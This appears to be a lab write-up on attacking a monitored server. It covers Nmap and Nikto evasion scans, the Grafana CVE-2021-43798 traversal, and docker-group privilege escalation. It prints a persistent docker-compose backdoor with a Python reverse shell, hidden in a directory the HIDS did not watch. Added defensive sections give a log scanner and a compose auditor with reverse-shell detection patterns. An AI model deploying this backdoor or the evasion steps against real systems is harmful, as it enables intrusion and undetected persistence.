The server runs Grafana internally (port 3000), with Suricata as NIDS and Wazuh as HIDS.
Testing for alerts with Nmap & Nikto
NMAP
Using NULL and STEALTH scans, user-agent spoofing and decoy IPs
NIKTO
By default Nikto scans for every possible vulnerability; this can be tuned with -T n
(we used nikto -T 1 2 3 for directory discovery only):
# Type of scan (T for "tuning") and user agent specified:
nikto -T 1 2 3 4 -h <IP || host> -p 80 -useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
# Evasion & Encoding with -evasion+
nikto -e 1 7 *
Grafana 8.2.5 Vulnerability (CVE-2021-43798)
Exploitation:
Using https://github.com/pedrohavay/exploit-grafana-CVE-2021-43798 exploit:
Alert in Suricata
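CVE-2021-43798 is a directory traversal through Grafana's public plugin asset endpoint, so the condition Suricata alerts on is also visible after the fact in web-server or reverse-proxy access logs. The following is an added example, not part of the original writeup or of any Suricata ruleset: a stdlib-only Python check that flags requests under /public/plugins/ whose path still contains a ".." segment after percent-decoding (decoded twice to catch double encoding). The access-log lines, client addresses and plugin name are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (not from the page or a real host).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /public/plugins/example-panel/module.js HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /public/plugins/example-panel/../../../../../../etc/hostname HTTP/1.1" 200 14
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /public/plugins/example-panel/..%2F..%2F..%2Fetc%2Fhostname HTTP/1.1" 200 14
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /api/health HTTP/1.1" 200 30
"""

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def has_traversal(raw_path):
    """True if the path contains a '..' segment once percent-encoding is removed.
    Decoding twice handles %252e%252e-style double encoding; the query string is ignored."""
    path = raw_path.split("?", 1)[0]
    decoded = unquote(unquote(path))
    return ".." in decoded.split("/")


def find_plugin_traversals(log_text, prefix="/public/plugins/"):
    """Return (client, method, raw_path) for every request to the plugin asset
    endpoint that carries a traversal sequence. Non-request lines are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        raw_path = m.group("path")
        if raw_path.startswith(prefix) and has_traversal(raw_path):
            client = line.split(" ", 1)[0]
            hits.append((client, m.group("method"), raw_path))
    return hits


if __name__ == "__main__":
    for client, method, path in find_plugin_traversals(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {method} {path}")
```

A 200 status on such a request is the important signal in the log: a patched Grafana (8.3.1 or later, or the 8.0.7/8.1.8/8.2.7 backports) answers these with an error instead of file contents.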
Privilege Escalation
DOCKER ABUSE
As the current user is part of the docker group, we can run an interactive container and mount the host's root filesystem into it, which lets us edit the sudoers file and add our user to obtain sudo privileges.
Since the HIDS monitors the most common files and folders, there is one it does not monitor (/var/lib), which is where all Docker files are stored. We just created a docker-compose.yml with an entrypoint that opens a reverse shell:
---
version: "2.1"
services:
  backdoorservice:
    restart: always
    image: # Existing container image on the system (name, not tag)
    entrypoint: >
      python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
      s.connect(("<remote_IP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
      pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true
Then we ran docker-compose up and caught the connection on the listener.
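The gap described above has two parts a defender can check for directly: compose files that bind-mount sensitive host paths into privileged containers (kept under /var/lib/docker, which the HIDS here did not watch), and users in the docker group, who can reach root on the host through the daemon regardless of sudoers. The following is an added example, not from the original writeup or from Wazuh: a stdlib-only Python audit with a small line-based compose scanner (enough for the two-space layout docker-compose uses, so no YAML library is required) and a helper that lists docker group members. The compose file, image name, IP and /etc/group excerpt are constructed; the entrypoint line is an abbreviated, non-functional stand-in for the one on this page.

```python
import re

# Constructed docker-compose content mirroring the pattern on this page.
# Service names, image, address and the (deliberately non-functional) entrypoint are made up.
SAMPLE_COMPOSE = """\
version: "2.1"
services:
  web:
    image: nginx:stable
    ports:
      - "8080:80"
  backdoorservice:
    restart: always
    image: local-image
    entrypoint: >
      python -c 'import socket,os,pty; s.connect(("203.0.113.10",443)); pty.spawn("/bin/sh")'
    volumes:
      - /:/mnt
    privileged: true
"""

# Constructed /etc/group excerpt.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:alice
docker:x:999:alice,bob
"""

# Host paths that hand a container control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/var/lib/docker"}

# Fragments typical of an entrypoint/command that hands a shell to a remote peer.
SHELL_INDICATORS = re.compile(r"socket\.connect|pty\.spawn|/dev/tcp/|\bnc\b.* -e|\bbash -i\b")


def audit_compose(text):
    """Scan a compose file line by line and return (service, reason) findings for
    privileged services, sensitive bind mounts and reverse-shell indicators."""
    findings = []
    service = None
    in_services = False
    services_indent = service_indent = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(line) - len(line.lstrip(" "))
        if stripped == "services:":
            in_services, services_indent, service = True, indent, None
            continue
        if not in_services:
            continue
        if indent <= services_indent:          # back at top level: services block ended
            in_services = False
            continue
        if service_indent is None:             # first key under services: fixes the service indent
            service_indent = indent
        if indent == service_indent and stripped.endswith(":"):
            service = stripped[:-1]
            continue
        if re.fullmatch(r"privileged:\s*true", stripped):
            findings.append((service, "privileged container"))
        elif stripped.startswith("- ") and ":" in stripped[2:]:
            host_side = stripped[2:].strip("\"'").split(":", 1)[0]   # host part of host:container
            if host_side in SENSITIVE_HOST_PATHS:
                findings.append((service, f"bind-mounts sensitive host path {host_side}"))
        elif SHELL_INDICATORS.search(stripped):
            findings.append((service, "entrypoint/command contains reverse-shell indicators"))
    return findings


def docker_group_members(group_file_text):
    """Users in the docker group; each of them is effectively root on the host."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [u for u in fields[3].split(",") if u]
    return []


if __name__ == "__main__":
    for svc, reason in audit_compose(SAMPLE_COMPOSE):
        print(f"[compose] {svc}: {reason}")
    print("[group] docker members:", docker_group_members(SAMPLE_GROUP_FILE))
```

On a real host the scanner would be pointed at every compose file and at the `docker inspect` output of running containers, since a container started by hand has no compose file to audit. The monitoring gap itself is closed on the Wazuh side by adding /var/lib/docker (and the compose directories in use) to the syscheck `<directories>` list, and the docker group should contain only accounts that are already trusted with root.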